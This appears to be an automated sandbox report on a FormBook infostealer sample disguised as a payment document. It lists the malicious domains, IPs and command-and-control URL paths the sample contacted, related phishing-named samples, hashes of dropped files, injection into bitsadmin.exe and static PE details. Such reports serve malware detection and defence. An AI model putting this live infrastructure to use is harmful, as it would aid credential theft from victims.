                                                          http://www.amayavp.xyz/d9ku/?6dr=oAmOaC9rLcmuYnVpEIiUFnJetHEZs2bitsadmin.exe, 00000005.00000002.4599573362.000000000481C000.00000004.10000000.00040000.00000000.sdmp, bitsadmin.exe, 00000005.00000002.4601549732.0000000006680000.00000004.00000800.00020000.00000000.sdmp, QvLFrfAuvuCLc.exe, 00000006.00000002.4597320068.0000000003BFC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://ac.ecosia.org/autocomplete?q=bitsadmin.exe, 00000005.00000003.2587885669.00000000080C8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://www.hostgator.com.brbitsadmin.exe, 00000005.00000002.4599573362.0000000005188000.00000004.10000000.00040000.00000000.sdmp, QvLFrfAuvuCLc.exe, 00000006.00000002.4597320068.0000000004568000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchbitsadmin.exe, 00000005.00000003.2587885669.00000000080C8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=bitsadmin.exe, 00000005.00000003.2587885669.00000000080C8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://www.duwixushx.xyzQvLFrfAuvuCLc.exe, 00000006.00000002.4599520546.00000000056B4000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown

                                                                World Map of Contacted IPs

                                                                • No. of IPs < 25%
                                                                • 25% < No. of IPs < 50%
                                                                • 50% < No. of IPs < 75%
                                                                • 75% < No. of IPs

                                                                Public IPs

                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                149.88.81.190
                                                                		www.xcvbj.asiaUnited States
                                                                		188SAIC-ASUStrue
                                                                156.251.17.224
                                                                		www.duwixushx.xyzSeychelles
                                                                		132839POWERLINE-AS-APPOWERLINEDATACENTERHKtrue
                                                                172.67.167.146
                                                                		www.rgenerousrs.storeUnited States
                                                                		13335CLOUDFLARENETUStrue
                                                                209.74.77.107
                                                                		www.learnwithus.siteUnited States
                                                                		31744MULTIBAND-NEWHOPEUStrue
                                                                104.21.34.103
                                                                		www.rafconstrutora.onlineUnited States
                                                                		13335CLOUDFLARENETUStrue
                                                                185.27.134.144
                                                                		www.amayavp.xyzUnited Kingdom
                                                                		34119WILDCARD-ASWildcardUKLimitedGBfalse
                                                                27.124.4.246
                                                                		r0lqcud7.nbnnn.xyzSingapore
                                                                		64050BCPL-SGBGPNETGlobalASNSGtrue
                                                                172.67.145.234
                                                                		www.vayui.topUnited States
                                                                		13335CLOUDFLARENETUStrue
                                                                20.2.249.7
                                                                		www.7vh2wy.topUnited States
                                                                		8075MICROSOFT-CORP-MSN-AS-BLOCKUStrue
                                                                154.88.22.101
                                                                		www.t91rl7.proSeychelles
                                                                		40065CNSERVERSUStrue
                                                                85.159.66.93
                                                                		natroredirect.natrocdn.comTurkey
                                                                		34619CIZGITRfalse
                                                                161.97.168.245
                                                                		www.nb-shenshi.buzzUnited States
                                                                		51167CONTABODEtrue

                                                                General Information

                                                                Joe Sandbox version:41.0.0 Charoite
                                                                Analysis ID:1563620
                                                                Start date and time:2024-11-27 08:52:09 +01:00
                                                                Joe Sandbox product:CloudBasic
                                                                Overall analysis duration:0h 10m 9s
                                                                Hypervisor based Inspection enabled:false
                                                                Report type:full
                                                                Cookbook file name:default.jbs
                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                Number of analysed new started processes analysed:8
                                                                Number of new started drivers analysed:0
                                                                Number of existing processes analysed:0
                                                                Number of existing drivers analysed:0
                                                                Number of injected processes analysed:2
                                                                Technologies:
                                                                • HCA enabled
                                                                • EGA enabled
                                                                • AMSI enabled
                                                                Analysis Mode:default
                                                                Analysis stop reason:Timeout
                                                                Sample name:OUTSTANDING BALANCE PAYMENT.exe
                                                                Detection:MAL
                                                                Classification:mal100.troj.spyw.evad.winEXE@7/3@17/12
                                                                EGA Information:
                                                                • Successful, ratio: 66.7%
                                                                HCA Information:
                                                                • Successful, ratio: 86%
                                                                • Number of executed functions: 51
                                                                • Number of non-executed functions: 296
                                                                Cookbook Comments:
                                                                • Found application associated with file extension: .exe
                                                                • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                Warnings

                                                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                • VT rate limit hit for: OUTSTANDING BALANCE PAYMENT.exe

                                                                Simulations

                                                                Behavior and APIs

                                                                TimeTypeDescription
                                                                02:54:06API Interceptor10437549x Sleep call for process: bitsadmin.exe modified

                                                                Joe Sandbox View / Context

                                                                IPs

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                149.88.81.190PAYROLL LIST.exeGet hashmaliciousFormBookBrowse
                                                                • www.xcvbj.asia/hkgx/
                                                                purchase Order.exeGet hashmaliciousFormBookBrowse
                                                                • www.xcvbj.asia/rq1s/
                                                                RFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                                                • www.xcvbj.asia/rq1s/
                                                                156.251.17.224DOC_114542366.vbeGet hashmaliciousFormBookBrowse
                                                                • www.duwixushx.xyz/bmve/?Wno=a0qDq&KV=Rsosln+CouPFD70pouDpcL8MGxlXnptR0Qz9VzezY2yTYUIF1+nb00CRzlZGPtlDISGdoNhQK1cGxL7iAKAdT88wJdzRXyyanezdQrBbCEm548OmpMr0744=
                                                                172.67.167.146purchase Order.exeGet hashmaliciousFormBookBrowse
                                                                • www.rgenerousrs.store/o362/
                                                                Mandatory Notice for all December Leave and Vacation application.exeGet hashmaliciousFormBookBrowse
                                                                • www.rgenerousrs.store/zr8v/
                                                                209.74.77.107Purchase Order PO.exeGet hashmaliciousFormBookBrowse
                                                                • www.beyondfitness.live/fbpt/
                                                                RFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                                                • www.learnwithus.site/alu5/
                                                                185.27.134.144IETC-24017.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                • www.amayavp.xyz/572a/
                                                                purchase Order.exeGet hashmaliciousFormBookBrowse
                                                                • www.amayavp.xyz/d9ku/
                                                                DOC_114542366.vbeGet hashmaliciousFormBookBrowse
                                                                • www.amayavp.xyz/dcdf/
                                                                RFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                                                • www.amayavp.xyz/d9ku/
                                                                shipping doc_20241111.exeGet hashmaliciousFormBookBrowse
                                                                • www.hasthosting.xyz/04fb/
                                                                SHIPPING DOC_20241107.exeGet hashmaliciousFormBookBrowse
                                                                • www.hasthosting.xyz/04fb/
                                                                http://outlook-accede-aqui.iceiy.com/Get hashmaliciousUnknownBrowse
                                                                • outlook-accede-aqui.iceiy.com/jquery.min.js

                                                                Domains

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                www.learnwithus.siteRFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                                                • 209.74.77.107
                                                                r0lqcud7.nbnnn.xyzREQUESTING FOR UPDATED SOA.exeGet hashmaliciousFormBookBrowse
                                                                • 23.225.160.132
                                                                PAYROLL LIST.exeGet hashmaliciousFormBookBrowse
                                                                • 23.225.160.132
                                                                purchase Order.exeGet hashmaliciousFormBookBrowse
                                                                • 27.124.4.246
                                                                Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeGet hashmaliciousFormBookBrowse
                                                                • 202.79.161.151
                                                                RFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                                                • 27.124.4.246
                                                                New Order - RCII900718_Contract Drafting.exeGet hashmaliciousFormBookBrowse
                                                                • 23.225.159.42
                                                                www.xcvbj.asiaREQUESTING FOR UPDATED SOA.exeGet hashmaliciousFormBookBrowse
                                                                • 149.88.81.190
                                                                PAYROLL LIST.exeGet hashmaliciousFormBookBrowse
                                                                • 149.88.81.190
                                                                purchase Order.exeGet hashmaliciousFormBookBrowse
                                                                • 149.88.81.190
                                                                RFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                                                • 149.88.81.190
                                                                www.amayavp.xyzIETC-24017.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                • 185.27.134.144
                                                                purchase Order.exeGet hashmaliciousFormBookBrowse
                                                                • 185.27.134.144
                                                                DOC_114542366.vbeGet hashmaliciousFormBookBrowse
                                                                • 185.27.134.144
                                                                RFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                                                • 185.27.134.144
                                                                www.vayui.topZAMOWIEN.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                • 172.67.145.234
                                                                S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                • 104.21.95.160
                                                                purchase Order.exeGet hashmaliciousFormBookBrowse
                                                                • 172.67.145.234
                                                                RFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                                                • 172.67.145.234
                                                                www.7vh2wy.topItem-RQF-9456786.exeGet hashmaliciousUnknownBrowse
                                                                • 20.2.249.7

                                                                ASNs

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                MULTIBAND-NEWHOPEUSW3MzrFzSF0.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                • 209.74.77.109
                                                                FACTURA 24V70 VINS.exeGet hashmaliciousFormBookBrowse
                                                                • 209.74.64.190
                                                                DO-COSU6387686280.pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                • 209.74.77.109
                                                                packing list G25469.exeGet hashmaliciousFormBookBrowse
                                                                • 209.74.64.59
                                                                IETC-24017.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                • 209.74.77.108
                                                                PAYROLL LIST.exeGet hashmaliciousFormBookBrowse
                                                                • 209.74.77.109
                                                                file.exeGet hashmaliciousFormBookBrowse
                                                                • 209.74.77.109
                                                                VSP469620.exeGet hashmaliciousFormBookBrowse
                                                                • 209.74.77.108
                                                                CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                                • 209.74.77.108
                                                                Purchase Order PO.exeGet hashmaliciousFormBookBrowse
                                                                • 209.74.77.107
                                                                CLOUDFLARENETUSawb_shipping_post_27112024224782020031808174CN27112024000001124.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                • 104.21.91.199
                                                                https://farhimzaman.com/files/Enquiry.jsGet hashmaliciousUnknownBrowse
                                                                • 1.1.1.1
                                                                file.exeGet hashmaliciousUnknownBrowse
                                                                • 172.67.142.108
                                                                BitlordSetup_VOdKHS_0454250829.exeGet hashmaliciousDeal PlyBrowse
                                                                • 104.21.61.178
                                                                BitlordSetup_VOdKHS_0454250829.exeGet hashmaliciousDeal PlyBrowse
                                                                • 172.67.212.154
                                                                file.exeGet hashmaliciousUnknownBrowse
                                                                • 104.21.82.174
                                                                la.bot.arm5.elfGet hashmaliciousUnknownBrowse
                                                                • 104.29.206.99
                                                                file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                • 172.64.41.3
                                                                file.exeGet hashmaliciousLummaC StealerBrowse
                                                                • 104.21.80.208
                                                                ORDER-2411250089.PDF.jsGet hashmaliciousWSHRat, PureLog Stealer, Snake KeyloggerBrowse
                                                                • 172.67.177.134
                                                                SAIC-ASUSla.bot.arm6.elfGet hashmaliciousUnknownBrowse
                                                                • 149.65.107.71
                                                                REQUESTING FOR UPDATED SOA.exeGet hashmaliciousFormBookBrowse
                                                                • 149.88.81.190
                                                                PAYROLL LIST.exeGet hashmaliciousFormBookBrowse
                                                                • 149.88.81.190
                                                                purchase Order.exeGet hashmaliciousFormBookBrowse
                                                                • 149.88.81.190
                                                                yakuza.i586.elfGet hashmaliciousMiraiBrowse
                                                                • 139.121.41.93
                                                                arm4.elfGet hashmaliciousMiraiBrowse
                                                                • 149.83.228.200
                                                                spc.elfGet hashmaliciousMiraiBrowse
                                                                • 149.88.69.25
                                                                RFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                                                • 149.88.81.190
                                                                mips.elfGet hashmaliciousMiraiBrowse
                                                                • 149.64.190.242
                                                                x86.elfGet hashmaliciousUnknownBrowse
                                                                • 149.73.164.35
                                                                POWERLINE-AS-APPOWERLINEDATACENTERHKCertificate 11-18720.exeGet hashmaliciousFormBookBrowse
                                                                • 154.215.72.110
                                                                loligang.ppc.elfGet hashmaliciousMiraiBrowse
                                                                • 154.195.240.49
                                                                loligang.mips.elfGet hashmaliciousMiraiBrowse
                                                                • 154.193.88.157
                                                                Certificate 11-19AIS.exeGet hashmaliciousFormBookBrowse
                                                                • 154.215.72.110
                                                                ORIGINAL INVOICE COAU7230734290.exeGet hashmaliciousFormBookBrowse
                                                                • 154.216.76.80
                                                                Payroll List.exeGet hashmaliciousFormBookBrowse
                                                                • 154.216.76.80
                                                                Certificate 11-21AIS.exeGet hashmaliciousFormBookBrowse
                                                                • 154.215.72.110
                                                                Certificate 1045-20-11.exeGet hashmaliciousFormBookBrowse
                                                                • 154.215.72.110
                                                                Certificate 719A1120-2024.exeGet hashmaliciousFormBookBrowse
                                                                • 154.215.72.110
                                                                DOC_114542366.vbeGet hashmaliciousFormBookBrowse
                                                                • 156.251.17.224

                                                                JA3 Fingerprints

                                                                No context

                                                                Dropped Files

                                                                No context

                                                                Created / dropped Files

                                                                C:\Users\user\AppData\Local\Temp\Milburt

                                                                Download File
                                                                Process:C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):289280
                                                                Entropy (8bit):7.99458254036876
                                                                Encrypted:true
                                                                SSDEEP:6144:RCRsXvZKD+ckHKgep04FOteUnuyjV9/wouap6GN2T:6sXvsD+PHE/FOk2vwo32T
                                                                MD5:E348CB254457E2905C365D49A19B347E
                                                                SHA1:79D6ACB5406509D2440C47D98DE18F7DF1711EA8
                                                                SHA-256:B256DBB3444E48BDD1FD708EE7CAEED58EC486FEA8FB36191ADBEA2EBD005C30
                                                                SHA-512:08F1B198E0E9EF00D273D70E33B112F0E61AF0AF21372FC5A80642A94DB1FF1F2CD6D250A782F56FB9C61CB6360F3830AEED198AD7273E319246BA6F1FFF3D34
                                                                Malicious:false
                                                                Reputation:low
                                                                Preview:{..OWN93<O4J.36.COTN938.4J1R36WCOTN938O4J1R36WCOTN938O4J1R3.WCOZQ.=8.=...2z.b.<'J.H=[-C3^.4"!:!M.Z*.8D<._9c....^W+Qd<_9.WCOTN93AN=..2T.j#(.sYT.U...hSQ.Y....S_....V0..=-Q.X(.J1R36WCO..93tN5J.$.iWCOTN938.4H0Y2=WC.PN938O4J1Rs"WCODN93HK4J1.36GCOTL93>O4J1R36QCOTN938ODN1R16WCOTN;3x.4J!R3&WCOT^93(O4J1R3&WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J.&VN#COT:n78O$J1Rk2WC_TN938O4J1R36WCoTNY38O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O

                                                                C:\Users\user\AppData\Local\Temp\aut21DB.tmp

                                                                Download File
                                                                Process:C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):289280
                                                                Entropy (8bit):7.99458254036876
                                                                Encrypted:true
                                                                SSDEEP:6144:RCRsXvZKD+ckHKgep04FOteUnuyjV9/wouap6GN2T:6sXvsD+PHE/FOk2vwo32T
                                                                MD5:E348CB254457E2905C365D49A19B347E
                                                                SHA1:79D6ACB5406509D2440C47D98DE18F7DF1711EA8
                                                                SHA-256:B256DBB3444E48BDD1FD708EE7CAEED58EC486FEA8FB36191ADBEA2EBD005C30
                                                                SHA-512:08F1B198E0E9EF00D273D70E33B112F0E61AF0AF21372FC5A80642A94DB1FF1F2CD6D250A782F56FB9C61CB6360F3830AEED198AD7273E319246BA6F1FFF3D34
                                                                Malicious:false
                                                                Reputation:low
                                                                Preview:{..OWN93<O4J.36.COTN938.4J1R36WCOTN938O4J1R36WCOTN938O4J1R3.WCOZQ.=8.=...2z.b.<'J.H=[-C3^.4"!:!M.Z*.8D<._9c....^W+Qd<_9.WCOTN93AN=..2T.j#(.sYT.U...hSQ.Y....S_....V0..=-Q.X(.J1R36WCO..93tN5J.$.iWCOTN938.4H0Y2=WC.PN938O4J1Rs"WCODN93HK4J1.36GCOTL93>O4J1R36QCOTN938ODN1R16WCOTN;3x.4J!R3&WCOT^93(O4J1R3&WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J.&VN#COT:n78O$J1Rk2WC_TN938O4J1R36WCoTNY38O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O4J1R36WCOTN938O

                                                                C:\Users\user\AppData\Local\Temp\z5f52P3-

                                                                Download File
                                                                Process:C:\Windows\SysWOW64\bitsadmin.exe
                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                Category:dropped
                                                                Size (bytes):196608
                                                                Entropy (8bit):1.1239949490932863
                                                                Encrypted:false
                                                                SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                MD5:271D5F995996735B01672CF227C81C17
                                                                SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                Malicious:false
                                                                Reputation:high, very likely benign file
                                                                Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                Static File Info

                                                                General

                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                Entropy (8bit):7.146871750593404
                                                                TrID:
                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                File name:OUTSTANDING BALANCE PAYMENT.exe
                                                                File size:1'213'952 bytes
                                                                MD5:07bd00d307952e993352e5311a7fdf90
                                                                SHA1:05374cedfe58076e633a5968d2e29b8b5bf98e33
                                                                SHA256:50ff8e365c4211b6de55efdb7f73beed523f47eb35b0121ce7ea68c3c0739106
                                                                SHA512:ce3a2c1c6c935e30d42fb261c4365e8cb063e776bec4efba0a9b2d3155464915ff7324ac238b6e83768fc95e1c4fd0b084dc4cdc7b7ac3cafb488356ee853efd
                                                                SSDEEP:24576:4tb20pkaCqT5TBWgNQ7az3poxdWYigKlEX+qno6A:BVg5tQ7az3mZGEOx5
                                                                TLSH:0C45CF1373DD8361C3B25273BA657741BEBF782506A1F96B2FD8093DE920122521EA73
                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d..............'.a.....H.k.....H.h.....H.i......}%......}5...............~.......k.......o.......1.......j.....Rich...........

                                                                File Icon

                                                                Icon Hash:aaf3e3e3938382a0

                                                                Static PE Info

                                                                General

                                                                Entrypoint:0x425f74
                                                                Entrypoint Section:.text
                                                                Digitally signed:false
                                                                Imagebase:0x400000
                                                                Subsystem:windows gui
                                                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                Time Stamp:0x67467000 [Wed Nov 27 01:04:00 2024 UTC]
                                                                TLS Callbacks:
                                                                CLR (.Net) Version:
                                                                OS Version Major:5
                                                                OS Version Minor:1
                                                                File Version Major:5
                                                                File Version Minor:1
                                                                Subsystem Version Major:5
                                                                Subsystem Version Minor:1
                                                                Import Hash:3d95adbf13bbe79dc24dccb401c12091

                                                                Entrypoint Preview

                                                                Instruction
                                                                call 00007F95D8C4B0CFh
                                                                jmp 00007F95D8C3E0E4h
                                                                int3
                                                                int3
                                                                push edi
                                                                push esi
                                                                mov esi, dword ptr [esp+10h]
                                                                mov ecx, dword ptr [esp+14h]
                                                                mov edi, dword ptr [esp+0Ch]
                                                                mov eax, ecx
                                                                mov edx, ecx
                                                                add eax, esi
                                                                cmp edi, esi
                                                                jbe 00007F95D8C3E26Ah
                                                                cmp edi, eax
                                                                jc 00007F95D8C3E5CEh
                                                                bt dword ptr [004C0158h], 01h
                                                                jnc 00007F95D8C3E269h
                                                                rep movsb
                                                                jmp 00007F95D8C3E57Ch
                                                                cmp ecx, 00000080h
                                                                jc 00007F95D8C3E434h
                                                                mov eax, edi
                                                                xor eax, esi
                                                                test eax, 0000000Fh
                                                                jne 00007F95D8C3E270h
                                                                bt dword ptr [004BA370h], 01h
                                                                jc 00007F95D8C3E740h
                                                                bt dword ptr [004C0158h], 00000000h
                                                                jnc 00007F95D8C3E40Dh
                                                                test edi, 00000003h
                                                                jne 00007F95D8C3E41Eh
                                                                test esi, 00000003h
                                                                jne 00007F95D8C3E3FDh
                                                                bt edi, 02h
                                                                jnc 00007F95D8C3E26Fh
                                                                mov eax, dword ptr [esi]
                                                                sub ecx, 04h
                                                                lea esi, dword ptr [esi+04h]
                                                                mov dword ptr [edi], eax
                                                                lea edi, dword ptr [edi+04h]
                                                                bt edi, 03h
                                                                jnc 00007F95D8C3E273h
                                                                movq xmm1, qword ptr [esi]
                                                                sub ecx, 08h
                                                                lea esi, dword ptr [esi+08h]
                                                                movq qword ptr [edi], xmm1
                                                                lea edi, dword ptr [edi+08h]
                                                                test esi, 00000007h
                                                                je 00007F95D8C3E2C5h
                                                                bt esi, 03h
                                                                jnc 00007F95D8C3E318h
                                                                movdqa xmm1, dqword ptr [esi+00h]

                                                                Rich Headers

                                                                Programming Language:
                                                                • [ C ] VS2008 SP1 build 30729
                                                                • [IMP] VS2008 SP1 build 30729
                                                                • [ASM] VS2012 UPD4 build 61030
                                                                • [RES] VS2012 UPD4 build 61030
                                                                • [LNK] VS2012 UPD4 build 61030

                                                                Data Directories

                                                                NameVirtual AddressVirtual Size Is in Section
                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0xb70040x17c.rdata
                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0xc40000x5f48c.rsrc
                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x1240000x6c4c.reloc
                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x8d8d00x1c.rdata
                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb27300x40.rdata
                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IAT0x8d0000x860.rdata
                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                Sections

                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                .text0x10000x8b54f0x8b600f437a6545e938612764dbb0a314376fcFalse0.5699499019058296data6.680413749210956IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                .rdata0x8d0000x2cc420x2ce00827ffd24759e8e420890ecf164be989eFalse0.330464397632312data5.770192333189168IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                .data0xba0000x9d540x6200e0a519f8e3a35fae0d9c2cfd5a4bacfcFalse0.16402264030612246data2.002691099965349IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                .rsrc0xc40000x5f48c0x5f600b93354c1d77686772417e27ecd8215cfFalse0.9308880447247706data7.902101407002179IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                .reloc0x1240000xa4740xa6000bc98f8631ef0bde830a7f83bb06ff08False0.5017884036144579data5.245426654116355IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                Resources

                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                RT_ICON0xc45a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                RT_ICON0xc46d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                RT_ICON0xc47f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                RT_ICON0xc49200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                                RT_ICON0xc4c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                                RT_ICON0xc4d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                                RT_ICON0xc5bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                                RT_ICON0xc64800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                                RT_ICON0xc69e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                                RT_ICON0xc8f900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                                RT_ICON0xca0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                                RT_MENU0xca4a00x50dataEnglishGreat Britain0.9
                                                                RT_STRING0xca4f00x594dataEnglishGreat Britain0.3333333333333333
                                                                RT_STRING0xcaa840x68adataEnglishGreat Britain0.2747909199522103
                                                                RT_STRING0xcb1100x490dataEnglishGreat Britain0.3715753424657534
                                                                RT_STRING0xcb5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                                                RT_STRING0xcbb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                                                RT_STRING0xcc1f80x466dataEnglishGreat Britain0.3605683836589698
                                                                RT_STRING0xcc6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                                RT_RCDATA0xcc7b80x56791data1.0003275050608003
                                                                RT_GROUP_ICON0x122f4c0x76dataEnglishGreat Britain0.6610169491525424
                                                                RT_GROUP_ICON0x122fc40x14dataEnglishGreat Britain1.25
